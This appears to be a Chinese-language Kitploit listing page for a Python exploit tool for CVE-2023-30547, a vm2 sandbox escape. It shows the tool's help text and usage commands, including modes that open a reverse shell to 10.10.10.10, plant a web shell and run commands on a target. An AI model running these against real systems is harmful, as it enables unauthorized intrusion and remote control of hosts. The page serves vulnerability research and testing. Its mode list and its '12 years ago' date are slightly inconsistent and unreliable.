Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2023-30547 — 用于探索 CVE-2023-30547 的工具 | Kitploit
工具/GitHubGitHub/cur1iosity/cve-2023-30547
Payload生成漏洞分析漏洞利用Web应用程序漏洞利用渗透测试命令与控制
GitHubcur1iosity/cve-2023-30547

CVE-2023-30547

用于探索 CVE-2023-30547 的工具

查看仓库
12年前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2023-30547

Demonstration

漏洞描述

vm2 是一个沙箱,可以使用白名单中的 Node 内置模块运行不受信任的代码。 在版本不超过 3.9.16 的 vm2 中,异常净化(exception sanitization)存在一个漏洞,允许攻击者在 handleException() 内部引发未经净化的主机异常,从而利用该异常逃逸沙箱并在主机上下文中执行任意代码。

CVE-2023-30547.py

该工具是一个简单的 Python 脚本,可用于探索此漏洞。它有 4 种模式:

  • check:检查目标是否存在漏洞。
  • command_execution_execution:在目标上执行命令。
  • web_shell:在目标上打开 Web Shell。
  • reverse_shell:在目标上打开反向 Shell。

帮助

root@kitploit:~
usage: CVE-2023-30547.py [-h] -m {check,command_execution,web_shell,reverse_shell} -t TARGET [-c COMMAND] [-p PORT] [-i IP]

Tool for exploring CVE-2023-30547. 

options:
  -h, --help            show this help message and exit
  -m {check,command_execution,web_shell,reverse_shell}, --mode {check,command_execution,web_shell,reverse_shell}
                        Mode to run the tool in.
  -t TARGET, --target TARGET
                        Target to run the tool against.
  -c COMMAND, --command COMMAND
                        Command to execute in exploit mode.
  -p PORT, --port PORT  Local port to use for reverse shell.
  -i IP, --ip IP        Local ip to use for reverse shell.

用法

root@kitploit:~
python3 CVE-2023-30547.py -m check -t http://url.com/run
python3 CVE-2023-30547.py -m reverse_shell -t domain.com/run -p 1234 -i 10.10.10.10
python3 CVE-2023-30547.py -m web_shell -t domain.com/run
python3 CVE-2023-30547.py -m command_execution -t domain.com -c 'whoami'

参考:

  • https://gist.github.com/leesh3288/381b230b04936dd4d74aaf90cc8bb244
  • https://nvd.nist.gov/vuln/detail/CVE-2023-30547
下载工具